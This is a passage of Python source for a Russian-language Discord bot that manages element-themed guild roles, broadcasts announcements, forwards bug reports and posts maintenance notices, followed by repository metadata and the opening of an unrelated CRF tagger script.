{e}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\n\nasync def msgs_many(ctx, msg):\n\ttry:\n\t\tasync def give_me_message(ctx, msg, sho: str, time_wait: int):\n\t\t\tdef check(msg):\n\t\t\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\t\t\tembed_give_me = discord.Embed(title='Система сбора данных \"Український хакер Вiталя\"', description=f\"Напишите в чат {sho}\", color=standard_color)\n\t\t\tembed_give_me = models.embed_stan(embed_give_me)\n\n\t\t\tembed_you_do_not_s = discord.Embed(title='Система сбора данных', description=f\"Вы не написали в чат '{sho}'. 
\\nПереношу вас на прежнюю страницу.\", color=standard_color)\n\t\t\tembed_you_do_not_s = models.embed_stan(embed_you_do_not_s)\n\n\t\t\tawait msg.edit(embed=embed_give_me, view=models.NonBts())\n\n\t\t\ttry:\n\t\t\t\tvalue = await bot.wait_for(\"message\", check=check, timeout=time_wait)\n\t\t\texcept TimeoutError:\n\t\t\t\tawait msg.edit(embed=embed_you_do_not_s)\n\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\tawait msgs(ctx, msg)\n\t\t\telse:\n\t\t\t\tawait value.delete()\n\t\t\t\treturn value.content\n\n\t\ttry:\n\t\t\ttitle = await give_me_message(ctx, msg, \"title.\", 20)\n\t\t\tdesc = await give_me_message(ctx, msg, \"полное сообщение.\", 300)\n\t\t\tpin = await give_me_message(ctx, msg, \"надо закреплять сообщение?\", 20)\n\t\t\tping = await give_me_message(ctx, msg, \"надо пинговать гильдию\", 20)\n\t\texcept Exception:\n\t\t\tawait msgs(ctx, msg)\n\t\telse:\n\n\t\t\tasync def all_guilds():\n\t\t\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\t\t\tobj = []\n\n\t\t\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\t\t\tfor gui in gs:\n\t\t\t\t\tc = models.get_tag_value(\"CHANNEL\", f\"channel_{gui}\")\n\t\t\t\t\tc = await guild.fetch_channel(c)\n\t\t\t\t\tr = models.get_tag_value(\"ROLE\", f\"role_{gui}\")\n\t\t\t\t\tr = guild.get_role(r)\n\n\t\t\t\t\tobj.append({\"role\": r, \"channel\": c})\n\n\t\t\t\treturn obj\n\n\t\t\tall_guilds = await all_guilds()\n\n\t\t\tall_mes = []\n\n\t\t\tfor obj in all_guilds:\n\t\t\t\tmes = await message(title=title, desc=desc, ctx=ctx, pin=pin, ping=ping, guild_obj=obj)\n\t\t\t\tall_mes.append(mes)\n\n\t\t\tawait msgs(ctx, msg)\n\texcept KeyError as ke:\n\t\tawait something_went_wrong(msg, f\"Ошибка базы данных!\\n {ke}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {ke}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\texcept Exception as e:\n\t\tawait something_went_wrong(msg, f\"Неизвестная проблема, {e}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {e}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\texcept BotMissingPermissions as bmp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{bmp}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {bmp}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\texcept MissingPermissions as mp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{mp}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {mp}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\tfinally:\n\t\tLOGGER.success(\"All guild message!\")\n\n\n# ---------------------------------------------------------------------------\n\n# Не готовые функции\n\nasync def stat(ctx, msg):\n\tawait nope(ctx, msg, page_name=\"Статистика гильдий\", what_will_be_on_this_page=\"статистика сразу всех гильдий для ГМ-ов и смотрителей за гильдиями.\")\n\n\nasync def mana(ctx, msg):\n\tawait nope(ctx, msg, 
page_name=\"Управление гильдиями\", what_will_be_on_this_page=\"возможность управлять гильдиями для ГМ-ов и смотрителей.\")\n\n\n# ---------------------------------------------------------------------------\n\n# Вспомогательные функции\n\nasync def something_went_wrong(msg=None, problem: str = \"Внутреняя ошибка скрипта\", ctx: com.Context = None):\n\tembed = discord.Embed(title=\"О нет, что-то пошло не так!\", description=f\"В ходе выполнение определенных действий произошла ошибка, наши специалисты скорее всего уже решают её(они спят). \\n\"\n\t f\"Сведения об ошибке: {problem}\", color=standard_color)\n\n\tembed = models.embed_stan(embed)\n\tif msg is not None:\n\t\tawait msg.edit(embed=embed)\n\t\tawait asyncio.sleep(10)\n\t\tawait msg.delete()\n\telse:\n\t\tawait ctx.send(embed=embed, view=models.NonBts(), delete_after=60)\n\n\nasync def guild_ret(guild: str, ctx):\n\tif guild.lower() == \"dendro\" or guild.lower() == \"дендро\":\n\t\tguild_name = \"Dendro\"\n\n\telif guild.lower() == \"hydro\" or guild.lower() == \"гидро\":\n\t\tguild_name = \"Hydro\"\n\n\telif guild.lower() == \"pyro\" or guild.lower() == \"пиро\":\n\t\tguild_name = \"Pyro\"\n\n\telif guild.lower() == \"cryo\" or guild.lower() == \"крио\":\n\t\tguild_name = \"Cryo\"\n\n\telif guild.lower() == \"anemo\" or guild.lower() == \"анемо\":\n\t\tguild_name = \"Anemo\"\n\n\telif guild.lower() == \"electro\" or guild.lower() == \"электро\":\n\t\tguild_name = \"Electro\"\n\n\telif guild.lower() == \"geo\" or guild.lower() == \"гео\":\n\t\tguild_name = \"Geo\"\n\telse:\n\t\treturn [None, None]\n\n\tguild = await bot.fetch_guild(ctx.guild.id)\n\n\trole = guild.get_role(models.get_tag_value(\"ROLE\", f\"role_{guild_name}\"))\n\n\tchannel = await bot.fetch_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild_name}\"))\n\n\treturn {\"role\": role, \"channel\": channel}\n\n\n# ---------------------------------------------------------------------------\n\n# Функции профилей\n\nasync def return_profile(ctx=None, msg=None):\n\tacc = await access_lvl(ctx)\n\tif acc == 0:\n\t\treturn await user_profile(ctx, msg)\n\telif acc == 1:\n\t\treturn await Gmaster_profile(ctx, msg)\n\telse:\n\t\tif acc == 2:\n\t\t\treturn await Gvision_profile(ctx, msg)\n\t\telse:\n\t\t\tLOGGER.warning(\"Undefined lvl\")\n\n\nasync def get_stats_profile(user_id, msg, ctx):\n\tawait nope(ctx, msg, \"stats profile\", \"\")\n\n\nasync def nope(ctx, msg, page_name, what_will_be_on_this_page):\n\tembed_with_nope_page = discord.Embed(title=f'{page_name}',\n\t description=f\"Этой страницы ещё не существует. 
Когда-нибудь тут будет {what_will_be_on_this_page}\\n\\n\"\n\t f\"{ctx.author.nick}, эта страница будет закрыта через несколько секунд...\",\n\t color=standard_color)\n\n\tembed_with_nope_page = models.embed_stan(embed_with_nope_page)\n\n\tawait msg.edit(embed=embed_with_nope_page, view=models.NonBts())\n\tawait asyncio.sleep(10)\n\tawait msg.delete()\n\n\n# ---------------------------------------------------------------------------\n\n@bot.command(name=\"prof\", aliases=[\"проф\", \"п\", \"p\", \"з\"])\n@com.max_concurrency(number=1, per=com.BucketType.user, wait=False)\nasync def user_profile_Gmember_or_Gmaster_or_Gvision(ctx):\n\ttry:\n\t\tloading = discord.Embed(title=\"Загрузка\", description=\"Определяю уровень доступа...\\n\\n Загружаю данные...\", color=standard_color)\n\t\tloading = models.embed_stan(loading)\n\t\t#\n\t\t#\n\t\t#\n\t\tmsg = await ctx.send(embed=loading)\n\t\tawait return_profile(ctx, msg)\n\texcept Exception as exc:\n\t\tLOGGER.error(f\"Profile exception {exc}\")\n\t\tawait something_went_wrong(problem=str(exc), ctx=ctx)\n\n\n@bot.command(\n\tname=\"bug\",\n\taliases=[\"баг\", \"ошибка\"],\n\tbrief=\"Сообщение о баге на сервер поддержки бота\",\n\tusage=\"+bug [сообщение]\"\n)\nasync def bug_report(ctx, *, message=None):\n\ttry:\n\t\tserver = bot.get_guild(856964290777972787)\n\t\tbugs_channel = server.get_channel(875032089756577882)\n\t\tsession = secrets.token_hex(2)\n\texcept Exception as exc:\n\t\tLOGGER.error(f\"Bug report command error \\n{exc}\")\n\telse:\n\t\ttry:\n\t\t\tat_count = 0\n\t\t\tatts = [models.embed_stan(discord.Embed(title=f\"New bug...(session={session})\", description=f\"**Новый баг от {ctx.author.mention} Сообщение**: \\n\\n\\n \"\n\t\t\t f\"{message if message is not None else 'Не указано описание, скорее всего есть только фото.'}\",\n\t\t\t color=discord.Color.red(\n\n\t\t\t )))]\n\n\t\t\tfor attach in ctx.message.attachments:\n\t\t\t\tat_count += 1\n\t\t\t\tif at_count == 9:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tatts.append(discord.Embed(title=f\"session={session}\", color=discord.Color.red()).set_image(url=attach.url))\n\n\t\t\tasync def send():\n\t\t\t\tc = 0\n\t\t\t\tif at_count >= 1:\n\t\t\t\t\tc += 1\n\t\t\t\telif message is not None:\n\t\t\t\t\tc += 1\n\n\t\t\t\tif c >= 1:\n\t\t\t\t\tawait bugs_channel.send(embeds=atts)\n\t\t\t\t\tawait ctx.reply(embed=models.embed_stan(embed=discord.Embed(title=\"Отправлено\", color=discord.Color.green())), delete_after=5)\n\n\t\t\t\t\tawait asyncio.sleep(5)\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\n\t\t\tx = await send()\n\t\t\tif x is False:\n\t\t\t\tawait something_went_wrong(ctx=ctx, problem=\"Вы не указали ничего, что можно было-бы переслать хозяину.\")\n\t\t\telse:\n\t\t\t\tpass\n\t\t\tawait ctx.message.delete()\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(f\"Bug report command error \\n{exc}\")\n\t\t\tawait something_went_wrong(ctx=ctx, problem=str(exc))\n\t\t\traise ConnectionError(str(exc)) from exc\n\n\n@bug_report.error\nasync def error_handler(ctx, error):\n\tawait something_went_wrong(ctx=ctx, problem=str(error))\n\n\n# @bot.command(\n# name=\"тех\",\n# aliases=[\"tech\"],\n# usage='+tech date_wait=\"now\", time_wait=\"now\", *, reason=None'\n# )\n# @com.cooldown(1, 20, type=com.BucketType.user)\n# @com.is_owner()\n# async def tech_stop(ctx, date_wait=\"now\", time_wait=\"now\", *, reason=None):\n# async def get_date(date=None, cooldown_seconds=None):\n# timezone = dt.timezone(offset=dt.timedelta(hours=2), name=\"UTC\")\n# dt_now = 
dt.datetime.now(tz=timezone)\n#\n# if type(date) is not str or type(cooldown_seconds) is not str:\n# raise NotImplementedError\n#\n# try:\n# if date is None and cooldown_seconds == 'now':\n# return dt_now\n# else:\n# if cooldown_seconds is None and date == 'now':\n# return dt_now\n# else:\n# if date is None and cooldown_seconds is None:\n# return dt_now\n# else:\n# if date == 'now' and cooldown_seconds == 'now':\n# return dt_now\n# else:\n# if date == 'now' and cooldown_seconds != 'now':\n# year = dt_now.year\n# month = dt_now.month\n# day = dt_now.day\n#\n# hour = cooldown_seconds.split('.', -1)[0]\n# minute = cooldown_seconds.split('.', -1)[1]\n# second = cooldown_seconds.split('.', -1)[2]\n#\n# time_ret = datetime(year=int(year), month=int(month), day=int(day),\n# hour=int(hour), minute=int(minute), second=int(second), tzinfo=timezone)\n#\n# return time_ret\n#\n# elif cooldown_seconds == 'now' and date != 'now':\n# year = date.split('/', -1)[2]\n# month = date.split('/', -1)[1]\n# day = date.split('/', -1)[0]\n#\n# hour = dt_now.hour\n# minute = dt_now.minute\n# second = dt_now.second\n#\n#\n#\n# time_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n# hour=int(hour), minute=int(minute), second=int(second), tzinfo=timezone)\n#\n# return time_ret\n#\n# elif cooldown_seconds and date != \"now\":\n# year = date.split('/', -1)[2]\n# month = date.split('/', -1)[1]\n# day = date.split('/', -1)[0]\n#\n# hour = cooldown_seconds.split('.', -1)[0]\n# minute = cooldown_seconds.split('.', -1)[1]\n# second = cooldown_seconds.split('.', -1)[2]\n#\n# time_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n# hour=int(hour), minute=int(minute), second=int(second), tzinfo=timezone)\n# return time_ret\n#\n# except Exception as exc:\n# print(exc)\n# await ctx.send\n#\n# if date_wait and time_wait == \"now\":\n# return await ctx.send(ctx.command.usage)\n#\n# if reason is None:\n# reason = \"Технический перерыв\"\n# else:\n# reason = reason\n#\n# join_guild_channel = ctx.guild.get_channel(settings[\"ag_ci\"])\n#\n# if isinstance(join_guild_channel, discord.TextChannel):\n# pass\n# else:\n# await ctx.send(\"Не определился канал\", delete_after=5)\n# h = await join_guild_channel.history(limit=500).flatten()\n# for msg in h:\n# await msg.delete()\n#\n# async def get_time_stamp(date, cooldown_seconds) -> list[str | datetime] | str:\n# try:\n# cooldown_seconds: datetime = await get_date(date, cooldown_seconds)\n# times = cooldown_seconds.timestamp()\n# times = str(times).split(\".\")[0]\n# timestamp: str = f\"\"\n# return [timestamp, cooldown_seconds]\n# except Exception as exc:\n# print(f\"Timestamp exception {exc}\")\n# return [f\"\", datetime.now()]\n#\n# base_roles_1 = join_guild_channel.guild.get_role(794994804018642965)\n# base_roles_2 = join_guild_channel.guild.get_role(933746139264610314)\n#\n# await join_guild_channel.set_permissions(target=base_roles_1, overwrite=nextcord.PermissionOverwrite(view_channel=False))\n# await join_guild_channel.set_permissions(target=base_roles_2, overwrite=nextcord.PermissionOverwrite(view_channel=False))\n#\n# overwrites = {\n# join_guild_channel.guild.default_role: discord.PermissionOverwrite(view_channel=False, send_messages=False),\n# base_roles_1: discord.PermissionOverwrite(view_channel=True, send_messages=False),\n# base_roles_2: discord.PermissionOverwrite(view_channel=True, send_messages=False),\n# bot.user: discord.PermissionOverwrite(view_channel=True, send_messages=True),\n# ctx.author: 
discord.PermissionOverwrite(view_channel=True, send_messages=True)\n# }\n#\n# channel = await join_guild_channel.guild.create_text_channel(\n# position=0,\n# category=join_guild_channel.category,\n# name=f\"Технический перерыв\",\n# overwrites=overwrites,\n# reason=\"По приказу генерала гафса\",\n# topic=f\"Тех перерыв\",\n# slowmode_delay=1\n#\n# )\n# tms = await get_time_stamp(date_wait, time_wait)\n# tech_s_embed = discord.Embed(title=\"Технический перерыв\", description=f\"Временно приостановленна деятельность канала {join_guild_channel.mention} по причине:\\n**{reason}**\\n\\n\\n\\nКанал \"\n# f\"откроется {tms[0]}.\", color=discord.Color.red())\n# tech_s_embed = models.embed_stan(embed=tech_s_embed)\n# await channel.send(embed=tech_s_embed)\n# x: datetime = tms[1]\n#\n# x = dt.timedelta(h)\n#\n# await asyncio.wait()\n\n@bot.command(\n\tname=\"тех\",\n\taliases=[\"tech\"],\n\tusage='+tech date_wait=\"now\", time_wait=\"now\", *, reason=None'\n)\n@com.cooldown(1, 20, type=com.BucketType.user)\n@com.is_owner()\nasync def tech_stop(ctx, date_wait=\"now\", time_wait=\"now\", *, reason=None):\n\tasync def get_date(date=None, time=None):\n\t\tisrael_tz = dt.timezone(offset=dt.timedelta(hours=2), name=\"UTC\")\n\t\tdt_now = dt.datetime.now(tz=israel_tz)\n\n\t\tif type(date) is not str or type(time) is not str:\n\t\t\traise NotImplementedError\n\n\t\ttry:\n\t\t\tif date is None and time == 'now':\n\t\t\t\treturn dt_now\n\t\t\telse:\n\t\t\t\tif time is None and date == 'now':\n\t\t\t\t\treturn dt_now\n\t\t\t\telse:\n\t\t\t\t\tif date is None and time is None:\n\t\t\t\t\t\treturn dt_now\n\t\t\t\t\telse:\n\t\t\t\t\t\tif date == 'now' and time == 'now':\n\t\t\t\t\t\t\treturn dt_now\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif date == 'now' and time != 'now':\n\t\t\t\t\t\t\t\tyear = dt_now.year\n\t\t\t\t\t\t\t\tmonth = dt_now.month\n\t\t\t\t\t\t\t\tday = dt_now.day\n\n\t\t\t\t\t\t\t\thour = time.split('.', -1)[0]\n\t\t\t\t\t\t\t\tminute = time.split('.', -1)[1]\n\t\t\t\t\t\t\t\tsecond = time.split('.', -1)[2]\n\n\t\t\t\t\t\t\t\ttime_ret = datetime(year=int(year), month=int(month), day=int(day),\n\t\t\t\t\t\t\t\t hour=int(hour), minute=int(minute), second=int(second), tzinfo=israel_tz)\n\n\t\t\t\t\t\t\t\treturn time_ret\n\n\t\t\t\t\t\t\telif time == 'now' and date != 'now':\n\t\t\t\t\t\t\t\tyear = date.split('/', -1)[2]\n\t\t\t\t\t\t\t\tmonth = date.split('/', -1)[1]\n\t\t\t\t\t\t\t\tday = date.split('/', -1)[0]\n\n\t\t\t\t\t\t\t\thour = dt_now.hour\n\t\t\t\t\t\t\t\tminute = dt_now.minute\n\t\t\t\t\t\t\t\tsecond = dt_now.second\n\n\t\t\t\t\t\t\t\ttime_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n\t\t\t\t\t\t\t\t hour=int(hour), minute=int(minute), second=int(second), tzinfo=israel_tz)\n\n\t\t\t\t\t\t\t\treturn time_ret\n\n\t\t\t\t\t\t\telif time and date != \"now\":\n\t\t\t\t\t\t\t\tyear = date.split('/', -1)[2]\n\t\t\t\t\t\t\t\tmonth = date.split('/', -1)[1]\n\t\t\t\t\t\t\t\tday = date.split('/', -1)[0]\n\n\t\t\t\t\t\t\t\thour = time.split('.', -1)[0]\n\t\t\t\t\t\t\t\tminute = time.split('.', -1)[1]\n\t\t\t\t\t\t\t\tsecond = time.split('.', -1)[2]\n\n\t\t\t\t\t\t\t\ttime_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n\t\t\t\t\t\t\t\t hour=int(hour), minute=int(minute), second=int(second), tzinfo=israel_tz)\n\t\t\t\t\t\t\t\treturn time_ret\n\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(\n\t\t\t\tf\"TECH command error \\n {exc}\"\n\t\t\t)\n\t\t\tawait ctx.send(exc)\n\n\tif date_wait and time_wait == \"now\":\n\t\treturn await 
ctx.send(ctx.command.usage)\n\n\tif reason is None:\n\t\treason = \"Технический перерыв\"\n\telse:\n\t\treason = reason\n\n\tjoin_guild_channel = ctx.guild.get_channel(settings[\"ag_ci\"])\n\n\tif isinstance(join_guild_channel, discord.TextChannel):\n\t\tpass\n\telse:\n\t\tawait ctx.send(\"Не определился канал\", delete_after=5)\n\th = await join_guild_channel.history(limit=500).flatten()\n\tfor msg in h:\n\t\tawait msg.delete()\n\n\tasync def get_time_stamp(date, time) -> str:\n\t\ttry:\n\t\t\ttime: datetime = await get_date(date, time)\n\t\t\ttimes = time.timestamp()\n\t\t\ttimes = str(times).split(\".\")[0]\n\t\t\ttimestamp: str = f\"\"\n\t\t\treturn timestamp\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(f\"get timestamp exception {exc}\")\n\t\t\treturn f\"\"\n\n\ttech_s_embed = discord.Embed(title=\"Технический перерыв\", description=f\"Временно приостановленна деятельность канала {join_guild_channel.mention} по причине:\\n**{reason}**\\n\\n\\n\\nКанал \"\n\t f\"откроется {await get_time_stamp(date_wait, time_wait)}.\", color=discord.Color.red())\n\ttech_s_embed = models.embed_stan(embed=tech_s_embed)\n\tawait join_guild_channel.send(embed=tech_s_embed)\n\n\n@tech_stop.error\nasync def err(ctx, exception):\n\tif isinstance(exception, com.NotOwner):\n\t\tawait ctx.send(\"Недостаточно прав\", delete_after=15)\n\telif isinstance(exception, com.CommandOnCooldown):\n\t\tawait ctx.send(f\"Подожди {exception.retry_after:.2f}\", delete_after=15)\n\n\nasync def is_in_guild(ctx, guilds, member) -> tuple[str, bool]:\n\tfor g in guilds:\n\t\trole_id = models.NEDOGUILD().get_one_tag(guild=g, tag=\"role\")\n\t\trole = ctx.guild.get_role(role_id)\n\n\t\tif role in member.roles:\n\t\t\treturn g, True\n\n\treturn \"None\", False\n\n\nclass UnknownGuild(GmasterNotDefined):\n\tmsg = \"Гильдия не определена\"\n\n\n@bot.command(\n\tname=\"гильдия\",\n\taliases=[\n\t\t\"guild\",\n\t\t\"g\",\n\t\t\"г\"\n\t]\n)\n# @com.cooldown(1, 20, type=com.BucketType.user)\nasync def get_into(ctx, member: nextcord.Member):\n\tinvite_state = False\n\tguild_master = GuildMaster(\n\t\tctx=ctx\n\t)\n\n\tguild_name, user_in_guild = await is_in_guild(ctx, GUILDS, member=member)\n\n\tLOGGER.info(f\"{guild_name} === {user_in_guild}\")\n\n\tif guild_master.guild.lower() == 'unknown':\n\t\traise GmasterNotDefined\n\n\tdefense = GuildDefense(bot, ctx.guild, member.id, guild_master.guild)\n\n\twith open(\"additional_files/invites.json\", \"r\", encoding=\"UTF-8\") as invites_file:\n\t\tinvites_dict = json.load(invites_file)\n\n\ttry:\n\t\tif member.id in invites_dict[\"ids_list\"]:\n\t\t\tinvite_state = True\n\t\telif invites_dict[f\"invite_{member.id}\"][\"in_creating_invite\"]:\n\t\t\tinvite_state = True\n\n\texcept Exception as exc:\n\t\tinvite_state = False\n\t\tLOGGER.error(f\"Error in get_into -> invite creating check: {exc}\")\n\n\tdef do(defence: GuildDefense, invite_state: bool, guild_master: GuildMaster, user_in_guild: bool, guild_name: str) -> str or None:\n\t\tif defence.is_on_cooldown[0]:\n\t\t\tif user_in_guild:\n\t\t\t\treturn \"kick\"\n\n\t\t\treturn \"on_cooldown\"\n\n\t\telif invite_state:\n\t\t\treturn \"has_invite\"\n\n\t\telif user_in_guild:\n\t\t\tif guild_master.guild.strip().lower() == guild_name.strip().lower():\n\t\t\t\treturn \"kick\"\n\n\t\t\treturn \"other_guild\"\n\n\t\treturn \"add\"\n\n\tcase: str = do(defence=defense, invite_state=invite_state, guild_master=guild_master, user_in_guild=user_in_guild, guild_name=guild_name)\n\n\tLOGGER.success(case)\n\tif case == \"on_cooldown\":\n\t\tprops = 
defense.is_on_cooldown[1]\n\t\ttime_until_2m = datetime.fromtimestamp(float(props.get(\"until\", None))) + dt.timedelta(seconds=120)\n\n\t\ttimestamp_until = str(time_until_2m.timestamp()).split(\".\")[0]\n\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"{member.mention} недавно покинул {props.get('guild', '(ошибка)')}, он снова сможет вступить в гильдию !\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"has_invite\":\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"На имя {member.mention} уже отправлена заявка в одну из гильдий, невозможно его принять!\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\tLOGGER.warning(f\"Warning in get_into -> invite has check\")\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"kick\":\n\t\trole_id = models.NEDOGUILD().get_one_tag(guild=guild_name, tag=\"role\")\n\t\trole = ctx.guild.get_role(role_id)\n\n\t\tawait member.remove_roles(\n\t\t\trole, reason=\"По приказу генерала гафса!\"\n\t\t)\n\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Ура!\",\n\t\t\t\tdescription=f\"{member.mention} был исключен из гильдии {guild_name}!\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\tLOGGER.debug(f\"Kicked user from {guild_name}\")\n\n\t\tdefense.set_cooldown(cooldown_seconds=ONE_DAY_IN_SECONDS * 7) # 2 days\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"other_guild\":\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"Мастер гильдии {guild_master.guild} не может исключить пользователя из гильдии {guild_name}!\\n\\n\\n\\n***User collegium magistri variant!***\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\tLOGGER.debug(f\"User collegium magistri variant\")\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"add\":\n\t\trole_id = models.NEDOGUILD().get_one_tag(guild=guild_master.guild, tag=\"role\")\n\t\trole = ctx.guild.get_role(role_id)\n\n\t\tawait member.add_roles(\n\t\t\trole, reason=\"По приказу генерала гафса!\"\n\t\t)\n\n\t\tembed = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Ура!\",\n\t\t\t\tdescription=f\"{member.mention} был принят в гильдию {guild_master.guild}!\"\n\t\t\t)\n\t\t)\n\t\tLOGGER.success(f\"Successfully initiated {member.mention} into {guild_master.guild}\")\n\t\tawait ctx.send(embed=embed)\n\telse:\n\t\tembed = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"Неизвестный сценарий выполнения команды\"\n\t\t\t)\n\t\t)\n\t\tLOGGER.success(f\"Неизвестный сценарий match case into guild\")\n\t\tawait ctx.send(embed=embed)\n\n\n# if defense.is_on_cooldown[0]:\n# \tprops = defense.is_on_cooldown[1]\n# \ttime_until_2m = datetime.fromtimestamp(float(props.get(\"until\", None))) + dt.timedelta(seconds=120)\n#\n# \ttimestamp_until = str(time_until_2m.timestamp()).split(\".\")[0]\n#\n# \tembed_error = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Не вышло!\",\n# \t\t\tdescription=f\"{member.mention} вышел из {props.get('guild', '(ошибка)')}, он снова сможет вступить в гильдию .\",\n# \t\t\tcolor=nextcord.Color.red(),\n# \t\t)\n# \t)\n# \treturn await ctx.send(embed=embed_error)\n# # \tТипа если заявку делает.\n# elif invite_state:\n# \tembed_error = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Не 
вышло!\",\n# \t\t\tdescription=f\"У {member.mention} уже есть заявка!\",\n# \t\t\tcolor=nextcord.Color.red(),\n# \t\t)\n# \t)\n# \tLOGGER.warning(f\"Warning in get_into -> invite has check\")\n# \treturn await ctx.send(embed=embed_error)\n# elif user_in_guild:\n#\n# \trole_id = models.NEDOGUILD().get_one_tag(guild=guild_name, tag=\"role\")\n# \trole = ctx.guild.get_role(role_id)\n#\n# \tawait member.remove_roles(\n# \t\trole, reason=\"По приказу генерала гафса!\"\n# \t)\n#\n# \tembed_error = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Ура!\",\n# \t\t\tdescription=f\"У {member.mention} успешно покинул гильдию {guild_name}!\",\n# \t\t\tcolor=nextcord.Color.red(),\n# \t\t)\n# \t)\n# \tLOGGER.debug(f\"Warning in get_into -> user already has guild\")\n#\n# \tdefense.set_cooldown(cooldown_seconds=(60 * 60 * 24 * 2)) # 2 days\n# \treturn await ctx.send(embed=embed_error)\n#\n# else:\n# \tLOGGER.debug(invite_state)\n# \trole_id = models.NEDOGUILD().get_one_tag(guild=guild_master.guild, tag=\"role\")\n# \trole = ctx.guild.get_role(role_id)\n#\n# \tawait member.add_roles(\n# \t\trole, reason=\"По приказу генерала гафса!\"\n# \t)\n#\n# \tembed = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Ура!\",\n# \t\t\tdescription=f\"{member.mention} был принят в гильдию {guild_master.guild}!\"\n# \t\t)\n# \t)\n# \tLOGGER.success(f\"Successfully initiated {member.mention} into {guild_master.guild}\")\n# \tawait ctx.send(embed=embed)\n\n\n@get_into.error\nasync def get_into_error_handler(ctx, exception):\n\ttry:\n\t\traise exception\n\texcept GmasterNotDefined as exc:\n\t\tawait something_went_wrong(problem=f\"Гильд мастер не определен! \\n {exc}\", ctx=ctx)\n\n\t\tLOGGER.error(\n\t\t\tf\"Ошибка в досрочном принятии пользователя в гильдию! \\n {exc}\"\n\t\t)\n\texcept Exception as exc:\n\t\tawait something_went_wrong(problem=f\"Неизвестная ошибка! \\n {exc}\", ctx=ctx)\n\n\t\tLOGGER.error(\n\t\t\tf\"Ошибка в досрочном принятии пользователя в гильдию! 
\\n {exc}\"\n\t\t)\n\n\nif __name__ == '__main__':\n\tbot.run(token=settings['token'])\n","repo_name":"yatochka-dev/GuildsBot","sub_path":"slavebot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":78301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71037241795","text":"# -*- coding: utf-8 -*-\n\nimport pickle\nimport random\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\n\nimport numpy as np\nfrom scipy.misc import logsumexp\n\n\nclass CRF(object):\n\n def __init__(self, nt):\n # 词性数量\n self.nt = nt\n\n def create_feature_space(self, data):\n # 特征空间\n self.epsilon = list({\n f for wiseq, tiseq in data\n for f in set(self.instantiate(wiseq, 0, -1)).union(\n *[self.instantiate(wiseq, i, tiseq[i - 1])\n for i, ti in enumerate(tiseq[1:], 1)]\n )\n })\n # 特征对应索引的字典\n self.fdict = {f: i for i, f in enumerate(self.epsilon)}\n # 特征空间维度\n self.d = len(self.epsilon)\n\n # 特征权重\n self.W = np.zeros((self.d, self.nt))\n # Bigram特征及对应权重分值\n self.BF = [self.bigram(prev_ti) for prev_ti in range(self.nt)]\n self.BS = np.array([self.score(bfv) for bfv in self.BF])\n\n def SGD(self, trainset, devset, file,\n epochs, batch_size, interval, eta, decay, lmbda,\n anneal, regularize):\n # 训练集大小\n n = len(trainset)\n # 记录更新次数\n count = 0\n # 记录迭代时间\n total_time 